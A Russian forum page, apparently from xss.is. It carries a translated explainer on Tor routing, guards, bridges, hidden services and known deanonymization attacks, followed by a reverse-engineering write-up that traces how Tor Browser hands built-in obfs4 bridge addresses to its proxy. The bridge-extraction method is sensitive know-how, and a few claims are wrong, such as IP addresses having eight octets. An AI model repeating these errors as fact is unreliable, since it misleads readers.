Конечный узел знает что это за сообщение и куда оно направляется. Но не знает, кто его отправил. Всё, что он знает - это то, что Узел 3 послал ему сообщение, но он не знает ни о ком другом на этом пути. Одним из ключевых моментов здесь является то, что когда узел расшифровывает слой, он не может сказать сколько ещё слоёв нужно расшифровать. Это может быть как 1 или 2, так и 200 уровней шифрования.

Теперь Amazon ни за что не узнает, что вы смотрите Netflix! Netflix отправляет обратно часть сериала Stranger Things.

Давайте посмотрим как это работает в обратном направлении.

Узел 4 добавляет свой уровень шифрования. Он не знает, кто первоначально сделал запрос. Всё что он знает - это то, что Узел 3 отправил ему запрос. Поэтому он отправляет ответное сообщение обратно Узлу 3.

И так далее для следующих узлов.

Сейчас ответный пакет полностью зашифрован.

В результате пакет полностью зашифрован. И единственный, кто по-прежнему знает что содержит сообщение - это Узел 4. Единственный кто знает, кто создал сообщение, - это Узел 1. Теперь, когда мы получили полностью зашифрованный ответ, мы можем использовать все симметричные ключи для его расшифровки.

Вы можете подумать: "Я видел улиток и побыстрее". И будете правы. Этот протокол не рассчитан на скорость, но в то же время он заботится о скорости.

Алгоритм может быть гораздо медленнее, но более безопасным (используя криптографию с открытым ключом вместо криптографии с симметричным ключом). Но удобство имеет значение. Так что да, он медленный. Нет, он не настолько медленный как мог бы быть.

Обычно используется шифрование AES с передачей ключа по методу [Диффи-Хеллмана](https://skerritt.blog/diffie-hellman- merkle/).

Пути, которые создает Tor, называются цепями. Давайте рассмотрим, как Tor выбирает узлы для использования.

Как создаётся цепь?

Каждый компьютер, когда он хочет создать цепь, сначала выбирает выходной узел, а затем другие узлы. Цепи Tor всегда состоят из 3 узлов. Увеличение длины цепи не приводит к улучшению анонимности: если злоумышленник владеет первым и последним узлами в сети, вы можете иметь 1500 узлов, но это не сделает вас более защищённым.

Когда Tor выбирает выходной узел, он выбирает его, следуя следующим принципам:

1. Есть ли в torrc (конфигурационном файле) клиента настройки о том, какие узлы не выбирать?
2. Tor выбирает только тот выходной узел, который позволяет вам выйти из сети Tor. Некоторые узлы разрешают только веб-трафик (HTTP на 80-м порту), что не очень удобно когда хочется отправить электронную почту (SMTP, порт 25).
3. Выходной узел должен обладать достаточной пропускной способностью, чтобы суметь обслуживать вас. Tor пытается выбрать узел выхода, который имеет достаточно ресурсов.

Все пути в цепи подчиняются следующим правилам:

Мы не выбираем один и тот же маршрутизатор дважды для одного и того же пути.

Если вы выберете один и тот же узел дважды, то гарантируется что он будет либо сторожевым узлом (узел, в который вы входите), либо узлом выхода - оба варианта опасны. Существует вероятность 2/3, что это будет и сторожевой узел и узел выхода - что ещё опаснее. Мы хотим избежать атак входа/выхода.

Это не okay. Цвет узла изменён, чтобы показать что он один и тот же.

Мы не выбираем ни один маршрутизатор из того же семейства, что и другой на том же пути (два маршрутизатора принадлежат к одному семейству, если каждый из них указывает другой в "семействе" записей своего описания).

Операторы, управляющие более чем одним узлом Tor, могут выбрать обозначение своих узлов как "семейных". Это означает, что у всех узлов один родитель (оператор сети). Это снова является контрмерой против атак входа/выхода. Хотя операторы не обязаны объявлять "семью". Если они хотят стать сторожевым узлом (об этом речь ниже), рекомендуется объявить "семью" (но это не обязательно.

Не вариант.

Мы не выбираем более одного маршрутизатора в подсети /16.

Подсети определяют сети. IP-адреса состоят из 8 октетов. Например, IP-адрес Google в двоичном формате имеет вид:
01000000.11101001.10101001.01101010

Первые 16 бит (подсеть /16) равны 01000000.11101001, что означает, что Tor не выбирает узлы, начинающиеся с тех же 16 бит, что и этот IP-адрес. Опять же, это контрмера против атак входа/выхода.

Не вариант.

Если вопрос о подсетей кажется вам запутанным, я написал код на языке Python, чтобы объяснить его:

Python:Copy to clipboard

# ip addresses are in binary, not the usual base 10 subnets are usually powers of 2, this is 2^4. IP = "01000000.11101001.10101001.01101010" subnet = 16 # this will store the subnet address once we find it subnet_ip = [] IP_list = list(IP) counter = 0 for i in IP_list: # we want to end the loop when we reach the subnet number if counter >= subnet: break # the ip address segments each oclet of bits with full stops # we don't want to count a fullstop as a number # but we want to include it in the final subnet if i == ".": subnet_ip.append(".") continue else: # else it is a number so we append and increment counter subnet_ip.append(i) counter = counter + 1 print("Subnet is " + ''.join(subnet_ip))

Мы не выбираем ни один неработающий или невалидный маршрутизатор, если только не были специально настроены на него. По-умолчанию мы настроены на разрешение невалидных маршрутизаторов в позициях "middle" и "rendezvous".

Неработающий означает, что узел в настоящее время не работает. Не стоит выбирать то, что не работает. Невалидный означает, что какая-то конфигурация в torrc узла неверна. Вы не хотите принимать странные конфигурации, если они пытаются взломать или сломать что-то.

Первый узел должен быть** Сторожевым узлом**.

Сторожевой узел - это привилегированный узел, потому что он видит реальный IP- адрес пользователя. Стать сторожевым узлом "дорого" (нужно поддерживать высокую работоспособность в течение нескольких недель и иметь хорошую пропускную способность).

Это возможно для крупных компаний, имеющих 99,9% бесперебойной работы и высокую пропускную способность (например, Netflix). У Tor нет возможности помешать могущественным противникам зарегистрировать множество сторожевых узлов. В настоящее время Tor настроен так, что один сторожевой узел будет работать 12 недель в году. Вам придётся выбрать 4 новых сторожевых узла в год.

Это означает, что если вы используете Tor один раз для просмотра Amazon Prime Video, то вероятность того, что Netflix станет вашим сторожевым узлом, относительно мала. Конечно, чем больше сторожевых узлов создает Netflix, тем больше вероятность подобного. Хотя, если Netflix знает что вы подключаетесь к сети Tor для просмотра Amazon Prime Video, им придётся ждать 4 недели, пока их подозрения подтвердятся (если только они не нападут на сторожевой узел и не захватят его).

Стать сторожевым узлом относительно просто для крупной организации. Стать узлом выхода немного сложнее, но всё же возможно. Предположим, что крупная организация обладает бесконечной вычислительной мощностью, чтобы смочь сделать это. Решение состоит в том, чтобы сделать атаку очень дорогой и с низкой вероятностью успеха.

Чем больше пользователей Tor, тем сложнее крупной организации атаковать его. Если Netflix контролирует 50% узлов в сети:

Вероятность того, что вы выберете сторожевой узел от Netflix, равна 50%.

Если вдруг присоединится ещё 50 узлов (это 1/3), то это уменьшит вероятность, что Netflix владеет сторожевым узлом (а значит, и потенциальной атакой) и сделает его ещё более дорогим.

В Tor сила - в количестве.

Guard Pinning

Когда Tor-клиент запускается в первый раз, он подбирает случайный набор сторожевых узлов. В течение следующих нескольких месяцев он следит за тем, чтобы каждая цепь использовала один из этих предварительно выбранных узлов в качестве сторожевого узла.

Сообщение из документации Tor гласит:

1. Introduction and motivation

Tor uses entry guards to prevent an attacker who controls some
a fraction of the network from observing a fraction of every user's
traffic. If users chose their entries and exits uniformly at
random from the list of servers every time they build a circuit,
then an adversary who had (k/N) of the network would deanonymize
F=(k/N)^2 of all circuits... and after a given user had built C
circuits, the attacker would see them at least once with
probability 1-(1-F)^C. With large C, the attacker would get a
sample of every user's traffic with probability 1.

To prevent this from happening, Tor clients choose a small number
of guard nodes (currently 3). These guard nodes are the only
nodes that the client will connect to directly. If they are not
compromised, the user's paths are not compromised.

But attacks remain. Consider an attacker who can run a firewall
between a target user and the Tor network, and make many of the
guards they don't control appear to be unreachable. Or consider
an attacker who can identify a user's guards, and mount
denial-of-service attacks on them until the user picks a guard
that the attacker controls.

Click to expand...

Привязка сторожевых узлов важна из-за особенности модели угроз Tor. Tor предполагает, что злоумышленнику может потребоваться всего одно открытие, чтобы выяснить, с кем вы разговариваете или кто вы такой. Поскольку одна уязвимая схема может разрушить вашу конфиденциальность, Tor старается минимизировать вероятность того, что мы когда-либо создадим одну или несколько уязвимых схем.

Сторожевые узлы Tor могут подвергнуться DDOS'у или злоумышленник может получить большинство сторожевых узлов в Интернете, чтобы попытаться заполучить вас. Привязка сторожевых узлов позволяет значительно усложнить эту задачу.

В случае, если злоумышленник вычислит ваши сторожевые узлы и отключит их, вы будете вынуждены подключиться к их сторожевым узлам. Или вы подключаетесь к сторожевому узлу, контролируемому противником. Tor имеет алгоритмы, позволяющие обнаружить это. Они описаны [здесь](https://github.com/torproject/torspec/blob/master/proposals/271-another- guard-selection.txt).

Что такое узел каталога?

Состояние сети Tor отслеживается и публикуется группой из 9 доверенных серверов (по состоянию на 2019 год), известных как узел каталога. Каждый из них контролируется отдельной организацией.

Каждый узел является отдельной организацией, поскольку это обеспечивает резервное копирование и распределяет уровень доверия. Целостность сети Tor зависит от честности и корректности узлов каталога. Поэтому обеспечение устойчивости сети и распределение доверия имеет решающее значение.

Узлы каталога ведут список работающих в настоящее время устройств (публично перечисленных в сети Tor). Раз в час узлы публикуют результаты совместного голосования. Консенсус - это единый документ, составленный и проголосованный каждым узлом. Это гарантирует, что все клиенты имеют одинаковую информацию о ретрансляторах, составляющих Tor.

Когда пользователь Tor (клиент или узел) хочет узнать текущее состояние сети, он обращается к узлу каталогов. Как мы увидим позже, это необходимы для всего Tor в целом, особенно для скрытых служб.

Relays поддерживают узлы каталога в актуальном состоянии. Они посылают узлу (узлам) уведомление всякий раз, когда появляются в сети или обновляются. Когда узел получает уведомление, он обновляется. Затем все узлы каталога используют это для формирования консенсуса сети.

Давайте теперь рассмотрим, что происходит когда в службах каталогов возникают разногласия при определении консенсуса.

В первых версиях Tor использовался простой подход к разрешению конфликтов: каждый узел передавал состояние сети так, как он его видел. Каждый клиент верил тому узлу, с которым общался в последнее время. Здесь нет консенсуса между всеми узлами каталогов.

В Tor это катастрофа... Ничто не гарантировало, что узлы говорят правду. Если бы злоумышленник захватил один узел, он мог бы лгать о состоянии сети.

Если клиент запросит у злоумышленника состояние сети, тот вернёт список. Этот список содержит только узлы, которые контролируются этим самым злоумышленником. А после клиент подключается именно к этим узлам.

Вторая версия Tor-каталогов усложнила эту атаку. Вместо того чтобы спрашивать мнение одного узла каталога, клиенты опрашивали каждый узла и объединяли их мнения. Однако клиенты могли формировать разные мнения о сети в зависимости от того, когда они в последний раз общались с каждым узлом каталога. Это приводило к статистической утечке информации - не так плохо, как в первой версии Tor. Кроме того, клиент должен был разговаривать с каждым узлом каталога, что занимало время и было слишком долго.

В третьей, текущей версии системы каталогов, ответственность за консенсус была перенесена с клиентов на узлы каталогов.

Что такое мостовые узлы?

Не уверен, видели ли вы это раньше, но я провел различие между узлами в службах каталогов и узлами, которые таковыми не являются.

Если какое-либо государство хочет заблокировать Tor, оно использует узлы каталога. Узлы каталогов хранят актуальные списки узлов ретрансляции Tor и находятся в открытом доступе для всех желающих.

Государство может запросить у узла каталога список активных ретрансляторов Tor и заблокировать весь трафик к ним.

Если вам интересно, то Tor поддерживает актуальный список стран в которых он может быть заблокирован.

Tor помогает своим пользователям обойти цензуру, скрывая тот факт, что они используют Tor. Для этого используется прокси-сервер, известный как Bridge Node. Пользователи Tor отправляют свой трафик на узел моста, который перенаправляет трафик на выбранные пользователем узлы охраны.

Полный список Bridge nodes никогда не публикуется, что затрудняет для государств полную блокировку Tor. Вы можете просмотреть некоторые узлы моста здесь. Если это не сработает, Tor предлагает:

Другой способ получить мосты - отправить электронное письмо на адрес [bridges@torproject.org](https://skerritt.blog/how-does-tor-really- work/bridges@torproject.org). Обратите внимание, что вы должны отправить письмо, используя адрес одного из следующих провайдеров электронной почты: Riseup или Gmail.

Click to expand...

Блокировать Tor можно и другим способом. Государственные цензоры могут использовать Deep Packet Inspection (DPI) для анализа данных о структуре, размере и характере каждого пакета. С помощью DPI государства могут распознать трафик Tor, даже если он подключается к неизвестным IP-адресам или зашифрован.

Чтобы обойти эту проблему, разработчики Tor создали Подключаемые Транспорты (PT). Они преобразуют поток трафика Tor между клиентом и мостом. По словам документации Tor:

Таким образом, цензоры, отслеживающие трафик между клиентом и мостом, будут видеть невинный на вид преобразованный трафик вместо реального трафика Tor. Другие программы могут общаться с клиентами Tor и мостами Tor, используя подключаемый транспортный API, чтобы облегчить создание совместимых программ.

Click to expand...

Скрытые возможности Tor

Вы когда-нибудь слышали эти байки: "В dark-web есть сайты, зайдя на которые вы увидите людей, занимающихся непристойными вещами, продающих запрещённые вещи или (что ещё хуже!) смотрящих фильм "Похмелье, часть 3".

Когда люди говорят об этих сайтах, они имеют в виду Tor Hidden Services.

Это довольно странная концепция, которая, честно говоря, заслуживает отдельной статьи в блоге. Скрытые сервисы - это серверы, как и любой другой обычный сервер.

Устройство (Знак вопроса) знает, что оно хочет получить доступ к Netflix, но оно ничего не знает о сервере. Сервер ничего не знает об устройстве, которое попросило доступ к нему. Это довольно запутанно, но не волнуйтесь - я собираюсь объяснить всё это с помощью классных диаграмм.

Когда сервер настраивается для работы в качестве скрытой службы, он посылает сообщение некоторым выбранным маршрутизаторам с вопросом: хотят ли они быть точкой внедрения на сервер. Сервер зависит от того, кто будет выбран в качестве точки внедрения, хотя обычно контрольными точками становятся 3 маршрутизатора.

Точки внедрения знают, что они будут внедрять посетителей на сервер.

Затем сервер создает нечто, называемое скрытым дескриптором службы, который содержит открытый ключ и IP-адрес каждой точки. Затем он отправляет дескриптор скрытой услуги в распределенную хэш-таблицу, что означает, что каждый маршрутизатор (не только точки внедрения) будет хранить часть информации о скрытой услуге.

Если вы попытаетесь найти скрытую услугу, то точка внедрения, отвечающая за неё, предоставит вам полный дескриптор скрытой услуги и адрес этой точки.

Ключом для этой хэш-таблицы является луковый адрес, сам адрес берётся из открытого ключа сервера.

Идея заключается в том, что луковый адрес не публикуется во всей сети Tor, но вы находите его другим способом: например, от друга или в Интернете (адреса, заканчивающиеся на .onion).

То, как запрограммирована распределённая хэш-таблица, означает, что подавляющее большинство узлов не знает какой дескриптор данного ключа.

Таким образом почти каждый onion-маршрутизатор будет иметь минимальные знания о скрытом сервисе, если только он явно не захочет его найти.

Предположим, кто-то дал вам onion-адрес. Вы запрашиваете дескриптор из хэш- таблицы и получаете обратно точки внедрения услуг.

Если вы хотите получить доступ к этому адресу, то вы сначала запросите дескриптор из хэш-таблицы. Дескриптор будет содержать, скажем, 4 или 5 IP- адресов вводных узлов. Вы выбираете один наугад, скажем, верхний.

Вы собираетесь попросить точку внедрения представить вас серверу, и вместо того, чтобы установить соединение непосредственно с сервером, вы устанавливаете точку встречи в случайном месте сети из заданного набора маршрутизаторов.

Здесь должно быть написано "Tor-узел". Я потерял файлы для этих графиков (спасибо LucidChart). Жаль, не могу обновить.
Затем вы прокладываете маршрут к этой точке и посылаете ей сообщение с вопросом, может ли она представить вас серверу, используя точку, которую вы только что использовали. Затем вы отправляете одноразовый пароль (в данном примере используем 'Labrador').

Точка встречи устанавливает связь с точкой внедрения и отправляет ей слово 'Labrador' и свой IP-адрес.

Точка внедрения отправляет сообщение на сервер, а сервер может принять его или ничего не делать.

Если сервер принимает сообщение, то он создаёт цепь к точке встречи.

Сервер отправляет в точку встречи сообщение. Точка встречи рассматривает оба сообщения - от вашего компьютера и от сервера. И говорит: "Хорошо, я получила сообщение от этого компьютера о том, что он хочет подключиться к этой службе и так сообщение от службы, спрашивающей, может ли она подключиться к компьютеру. Они должны поговорить друг с другом".

Затем точка встречи будет выступать в качестве ещё одного прыжка в цепи и соединять их.

Коротко о работе скрытой службы можно сказать следующее, взято [отсюда](https://tor.stackexchange.com/questions/672/how-do-onion-addresses- exactly-work):

1. Скрытый сервис вычисляет свою пару ключей (закрытый и открытый, асимметричное шифрование).
2. Затем выбирает несколько ретрансляторов в качестве точек внедрения.
3. Передаёт свой открытый ключ этим точкам по цепям Tor.
4. После этого создаёт дескриптор скрытого сервиса , содержащий его открытый ключ и информацию о его точках внедрения.
5. Скрытый сервис подписывает дескриптор скрытого сервиса своим закрытым ключом.
6. Затем он загружает дескриптор скрытого сервиса в Распределённую хэш- таблицу (DHT).
7. Клиенты узнают onion-адрес от скрытой службы вне сети. (например, публичный веб-сайт) ($hash.onion - это 16-символьное имя, полученное из открытого ключа службы).
8. После получения onion-адреса клиент подключается к DHT и запрашивает этот $hash.
9. Если он существует, клиент узнает открытый ключ скрытой службы и её точки внедрения.
10. Клиент выбирает случайным образом ретранслятор, чтобы построить к нему цепь и сообщить ему одноразовый секрет. Выбранный ретранслятор действует как точка встречи.
11. Клиент создает вводное сообщение , содержащее адрес точки внедрения и одноразовый секрет , после чего шифрует сообщение открытым ключом.
12. Клиент отправляет свое сообщение через Tor в одну из точек внедрения, требуя переслать его скрытому сервису.
13. Скрытый сервис расшифровывает сообщение с помощью своего закрытого ключа, чтобы узнать о месте внедрения и одноразовом секрете.
14. Скрытая служба создает сообщение о встрече , содержащее одноразовый секрет , и отправляет его по цепи в точку встречи.
15. Точка встречи сообщает клиенту, что соединение установлено.
16. Клиент и скрытая служба общаются друг с другом через эту точку встречи. Весь трафик шифруется, а точка просто передаёт его туда-обратно. Обратите внимание, что каждый из них, клиент и скрытый сервис, строит цепь до точки вчтречи. П ри трёх хопах на цепь получается шесть хопов в общей сложности.

Атаки на Tor

Tor защищает своих пользователей от попыток атак. Недруги хотят знать с кем разговаривает Алиса. Однако Tor не защищает от атак подтверждения. В этих атаках противник стремится ответить на вопрос "Говорит ли Алиса с Бобом?"

Подтверждающие атаки сложны и требуют подготовки и ресурсов. Атакующему необходимо иметь возможность отслеживать оба конца цепи. Атакующий может либо непосредственно отслеживать интернет-соединение каждого устройства, либо защитные узлы и узлы выхода.

Если Алиса посылает пакет следующего вида:

(timestamp, size, port, protocol)

(17284812, 3, 21, SSH)

Click to expand...

И если Боб получит этот пакет, злоумышленник сможет увидеть, что пакеты одинаковые - даже если злоумышленник не сможет увидеть, что это за пакет, поскольку он зашифрован. Имеет ли Боб склонность получать пакеты в то же время, когда их посылает Алиса? Одинаковы ли они по размеру? Если да, то можно сделать вывод, что Алиса и Боб общаются друг с другом.

Tor разбивает пакеты на большие куски не просто так - чтобы предотвратить подобные вещи. Tor [работает над добавлением](https://gitweb.torproject.org/torspec.git/tree/proposals/251-netflow- padding.txt) паддинга во все пакеты, чтобы усложнить эту задачу.

Они обсуждают возможность добавления рандомизации порядка пакетов. Но на данный момент это слишком дорого. [Браузер](https://tor.stackexchange.com/questions/108/does-tor-insert-random- delays-or-perform-packet-re-ordering-to-make-the-discover) добавляет некоторые дополнительные средства защиты, такие как переупорядочивание пакетов.

Если Алиса отправляет пакеты, A, B, C, а Боб получает их в B, A, C, труднее определить, что это одно и то же. Это не гарантирует безопасность, но осложняет детект.

Атака, при которой атакующий пытается контролировать оба конца цепи, называется атакой Силбила. Названа в честь главной героини книги "Sybil" за авторством Flora Rheta Schreiber. Мы обсуждали некоторые из этих атак ранее, когда атакующий контролирует оба защитных защиты и выходные узлы.

Атаки Сибила - это не теория. В 2014 году [исследователи из Университета Карнеги-Меллона](https://www.techdirt.com/articles/20151201/07281232952/tor- devs-say-theyve-learned-lessons-carnegie-mellon-attack-worries-remain-that- theyre-outgunned-outmanned.shtml) успешно провели её.

Когда Lizard Squad - группа хакеров попыталась осуществить атаку, система обнаружения подала сигнал тревоги. Tor имеет встроенную систему мониторинга против такого рода событий.

В [2007 году Дэн Эгерстад](https://www.smh.com.au/technology/the-hack-of-the- year-20071113-gdrkxw.html?page=fullpage#contentSwap2) - шведский консультант по безопасности - сообщил, что он перехватил имена пользователей и пароли, отправленные через Tor, будучи выходным узлом. В то время эти данные не были зашифрованы TLS или SSL.

Интересно, как Дэн Эгерстад так отозвался об узлах Tor:

Если вы посмотрите где размещаются эти узлы Tor и насколько они велики, то некоторые из них стоят тысячи долларов в месяц только за размещение, потому что они у них большая пропускную способность. Это тяжёлые серверы и так далее. Кто будет анонимно платить за это?

Click to expand...

Tor обычно не скрывает тот факт, что вы его используете. Многие сайты (например, [BBC'S iPlayer](https://www.bbc.co.uk/iplayer/help/troubleshooting/tv-games- consoles/in_the_uk_message) или правка в Википедии) блокируют вас при использовании известного узла Tor.

Некоторые приложения под управлением Tor раскрывают ваш истинный IP-адрес. Одним из таких приложений является BitTorrent.

Jansen и др. описали атаку, в ходе которой они осуществляют DDOS на узлы выхода. Ухудшая сеть (удаляя узлы выхода), атакующий увеличивает шанс получить узел выхода.

Пользователи Tor, которые посещают сайт дважды - один раз в Tor и один раз вне его - могут быть отслежены. То, как вы перемещаете мышь - уникально. В проекте Tor есть отчёт об ошибке измерения времени JavaScript, который показывает как можно отслеживать местоположение мыши на сайте (даже если он находится в Tor). Сняв отпечатки пальцев с человека дважды, вы будете уверены, что это один и тот же человек.

Следует отметить, что браузер Tor предлагает 3 уровня безопасности. Самый высокий уровень безопасности отключает JavaScript, некоторые изображения (так как они могут быть использованы для слежки за вами) и некоторые шрифты. Суть заключается в том, что если вам нужен Tor с высоким уровнем безопасности, то используйте версию с высоким уровнем безопасности.

Эти всё звучит круто. Но большинство пользователей Tor ловят не так: большинство пользователей совершают ошибки и попадаются сами.

Возьмите Dredd пирата Roberts, основателя Silk Road. Он выдал себя, написав об этом в социальных сетях.

Вспомните историю выше по тексту - про студента, который пытался отсрочить экзамен. Если бы он пошёл в кафе или еще куда-нибудь, с ним, вероятно, всё было бы в порядке.

На DEFCON 22 была фантастическая лекция о том, как были пойманы пользователи Tor. Ни одна из упомянутых историй не была вызвана Tor, а скорее плохим operations security.

Заключение

Tor - это интересный протокол. Полный алгоритмов, которые совершенствовались на протяжении многих лет. Я по достоинству оценил Tor и надеюсь, что вы тоже оцените.

Если вам понравилась эта статья и вы хотите получить еще больше подобных статей, подпишитесь на мой список рассылки. Я буду отправлять вам письма только тогда, когда у меня будет что-то новое, а это каждый месяц/два месяца или как-то так.

---
Оригинал статьи: https://skerritt.blog/how-does-tor-really-work/
Переведено специально для xss.is.

Как работает браузер Tor и где найти встроенные мосты Tor

ID: 676533bbb4103b69df371b64
Thread ID: 60760
Created: 2022-01-02T10:21:56+0000
Last Post: 2022-01-02T10:35:07+0000
Author: yashechka
Prefix: Статья
Replies: 1 Views: 2K

На конференции по кибербезопасности SecureWV 2019, проходившей в Чарльстоне, Западная Вирджиния, мы с Пейсу представили наш доклад "Рассмотрение мостов Tor и подключаемого транспорта". Теперь мы делимся более подробной информацией об этом исследовании, и наш анализ публикуется в двух статьях. В первой части этой серии из двух частей мы воспользуемся реверс-инжинирингом, чтобы объяснить, как найти встроенные мосты Tor и как браузер Tor работает с включенным мостом.

Браузер Tor и сеть Tor

Tor Browser - это инструмент, который обеспечивает анонимное подключение к Интернету в сочетании с уровнями шифрования через сеть Tor. Когда пользователи исследуют веб-сайты с помощью Tor Browser, их реальный IP-адрес скрывается сетью Tor, поэтому конечный веб-сайт никогда не знает, каков истинный исходный IP-адрес. Пользователи также могут создать свой собственный веб-сайт в сети Tor с доменным именем, заканчивающимся на ".onion". Таким образом, только браузер Tor может получить к нему доступ, и никто не знает его реальный IP- адрес. Это одна из причин, по которой преступники-вымогатели требуют от жертв доступа к странице оплаты на веб-сайте .onion через браузер Tor. Команда проекта Tor знает об этой практике, потому что в блоге проекта Tor четко сказано, что "Tor используется злоумышленниками не по назначению".

Tor Browser - это проект с открытым исходным кодом, созданный на основе Mozilla Firefox. Вы можете скачать исходный код с его официального сайта. Сеть Tor - это всемирная оверлейная сеть, состоящая из тысяч управляемых добровольцами ретрансляторов.

Что такое мост Тор?

Сеть Tor состоит из двух типов узлов ретрансляции: обычных узлов ретрансляции и узлов ретрансляции мостов. Обычные узлы ретрансляции перечислены в основном каталоге Tor, и соединения с ними могут быть легко идентифицированы и заблокированы цензорами. Информация о мосте Tor определяется в файле профиля Firefox, поэтому вы можете отобразить их, введя "about:config" в адресную строку браузера Tor, как показано на рисунке 1.

Однако узлы ретрансляции мостов не перечислены в основном каталоге Tor, а это означает, что цензоры не могут легко заблокировать подключения к ним. В этом блоге я расскажу, как найти эти мосты и узлы ретрансляции с помощью функций, встроенных в Tor Browser.

Чтобы использовать мост-ретранслятор в Tor Browser, есть два варианта. В Tor Browser есть несколько встроенных мостов, которые пользователи могут выбирать. Если встроенные мосты не работают, пользователи могут получить дополнительные мосты в настройках сети Tor, посетив TorProject.org или отправив электронное письмо по адресу bridges@bridges.torproject.org.

Анализ платформы браузера Tor

Этот анализ проводился на следующей платформе, а также на следующих версиях и расширениях Tor Browser:

- Windows 7 32-bit SP1
- Tor Browser 8.0
- TorLauncher 0.2.16.3 (one extension)
- Torbutton 2.0.6 (one extension)

На рисунке 2 показана информация о версии Tor Browser, над которым я работал.

Во время моего анализа Tor Browser выпустил новую версию: Tor Browser 9.0 22 октября 2019 года. Вы можете обратиться к Приложению этого анализа для получения дополнительной информации о нем.

Как запустить браузер Tor со встроенными мостами

Эта версия Tor Browser, которую я проанализировал, предоставляет четыре типа мостов: "obfs4", "fte", "meek-azure" и "obfs3". Их называют подключаемыми транспортами. Вы можете увидеть подробные настройки на рисунке 3.

Obfs4 Bridge настоятельно рекомендуется на официальном сайте Tor. Весь анализ, представленный ниже, основан на этом виде моста. Я выбрал мост "obfs4" в списке, показанном на рисунке 3, чтобы начать анализ. Изучая трафик, когда Tor Browser устанавливает соединение "obfs4", я обнаружил, что сеансы TCP создаются obfs4proxy.exe, который является клиентским процессом моста.

На рисунке 4 показан снимок экрана дерева процессов при запуске Tor Browser с "obfs4". Как видите, "firefox.exe" запускает "tor.exe", который затем запускает "obfs4proxy.exe". Процесс "obfs4proxy.exe" находится в «Папка_установки Tor\Browser\TorBrowser\Tor\PluggableTransports». Первоначально я думал, что встроенные мосты "obfs4" должны быть жестко запрограммированы внутри процесса "obfs4proxy.exe".

Трассировка и отслеживание в процессе Tor Bridge "obfs4proxy.exe"

Я запустил отладчик и присоединил его к "obfs4proxy.exe". Затем я устанавливаю точку останова на API "connect", который часто используется для установления TCP-соединений. Обычно с помощью реверс инжиниринга можно быстро обнаружить IP-адреса и порты из этого API. Однако у меня он не сработал до того, как были установлены соединения с мостом "obfs4". После дальнейшего анализа процесса "obfs4proxy.exe" я узнал, что вместо этого он использует другой API под названием "MSAFD_ConnectEx" из mswsock.dll.

На рисунке 5 показано, что "obfs4proxy.exe" собирается вызвать API "mswsock.MSAFD_ConnectEx()", чтобы установить TCP-соединение со встроенным мостом "obfs4", чей IP-адрес и порт - "192.95.36.142:443". Второй аргумент этой функции - указатель на структурную переменную struct sockaddr_in, которая содержит IP-адрес и порт для подключения. Позже он вызывает API WSASend и WSARecv для связи с мостом obfs4. Как вы могли заметить, отладчик OllyDbg не смог распознать этот API, потому что это не функция экспорта "mswsock.dll". Анализируя файл mswsock.dll в IDA Pro, мы видим, что адрес 750A7842 - это просто API "MSAFD_ConnectEx()". Кстати, инструкция "call dword ptr [ebx]" используется для вызова почти всех системных API-интерфейсов, которые нужны "obfs4proxy.exe", что позволяет скрыть API-интерфейсы от анализа.

По моему анализу, большинство PE-файлов (exe и dll-файлов, таких как "obfs4proxy.exe"), используемых Tor, похоже, скомпилированы "компилятором GCC MINGW-64w", который всегда использует "mov [esp],…" для передачи аргументов функциям вместо инструкций "push …", которые создают проблемы для статического анализа. Отслеживая и отслеживая поток стека вызовов из "MSAFD_ConnectEx()", я понял, что моя первоначальная мысль была неправильной, потому что встроенные IP-адреса и порты не жестко запрограммированы в "obfs4proxy.exe", а взяты из родительского процесса "Tor.exe" через локальное петлевое TCP-соединение.

Обычно третий пакет от tor.exe к obfs4proxy.exe содержит один встроенный IP- адрес моста obfs4 и порт в двоичном формате, как показано на рисунке 6. Это пакет Socks5 длиной 0xA байтов. "05 01 00 01" - это заголовок его протокола Socks5, а остальные данные - это IP-адрес и порт в двоичном формате. Пакет указывает, что он просит "obfs4proxy.exe" установить соединение с мостом с двоичным IP-адресом и портом. Затем "obfs4proxy.exe" анализирует пакет и преобразует двоичный IP-адрес и порт в строку, которая в данном случае — "154.35.22.13:16815".

Переход в Tor.exe

"Tor.exe" использует сторонний модуль с именем "libevent.dll" из libevent (библиотеки уведомлений о событиях), чтобы заставить Tor выполнять свои задачи. Tor помещает большинство своих задач сокетов (connect(), send(), recv() и т.д.) на события, которые будут автоматически вызываться libevent. При отслеживании пакета с IP-адресом и портом моста в "Tor.exe" вы можете увидеть в контексте стека вызовов, что многие адреса возврата находятся в модуле "libevent.dll". На рисунке 7 отладчик приостановил работу Tor.exe, вызвав API ws2_32.send(), чтобы отправить пакет, содержащий IP-адрес и порт моста, точно так же, как полученный пакет, показанный на рисунке 6.

На рисунке 7 показано окно "Стек вызовов", в котором показаны адреса возврата "libevent.dll".

Посредством трасировки/отслеживания "tor.exe", отправляющего IP-адрес и порт моста, я нашел место, где он запускает новое событие с функцией обратного вызова, которая затем отправляет IP-адрес и порт моста. Приведенный ниже фрагмент кода ASM показывает контекст вызова libevent.event_new() в tor.exe. Второй аргумент - дескриптор сокета; его третий аргумент - это действие при событии, которое здесь 14H, что означает EV_WRITE и EV_PERSIST; его четвертый аргумент - функция обратного вызова (в данном случае sub_2833EE); а его пятый аргумент содержит IP-адрес и порт моста, которые будут переданы функции обратного вызова (sub_2833EE) после ее вызова libevent.

Следующий фрагмент кода ASM взят из "tor.exe", чей базовый адрес на этот раз - 00280000h.

.text:00281C84 mov edx, eax
.text:00281C86 mov eax, [ebp+var_2C] ;
.text:00281C89 mov [eax+14h], edx
.text:00281C8C mov eax, [ebp+var_2C] ;
.text:00281C8F mov ebx, [eax+0Ch]
.text:00281C92 call sub_5133E0
.text:00281C97 mov edx, eax
.text:00281C99 mov eax, [ebp+var_2C]
.text:00281C9C mov [esp+10h], eax ; argument for callback function
.text:00281CA0 mov [esp+0Ch], offset sub_2833EE ; the callback function
.text:00281CA8 mov [esp+8], 14h ; #define EV_WRITE 0x04|#define EV_PERSIST 0x10
.text:00281CB0 mov [esp+4], ebx ; socket
.text:00281CB4 mov [esp], edx
.text:00281CB7 call event_new ; event_new(event_base, socket, event EV_READ/EV_WRITE, callback_fn, callback_args);
.text:00281CBC mov edx, eax
.text:00281CBE mov eax, [ebp+var_2C]
.text:00281CC1 mov [eax+18h], edx

Click to expand...

Путем непрерывной обратной трассировки в "tor.exe" я обнаружил группу мостов Obfs4, которые находятся в структуре данных команды "SETCONF", как показано на рисунке 8.

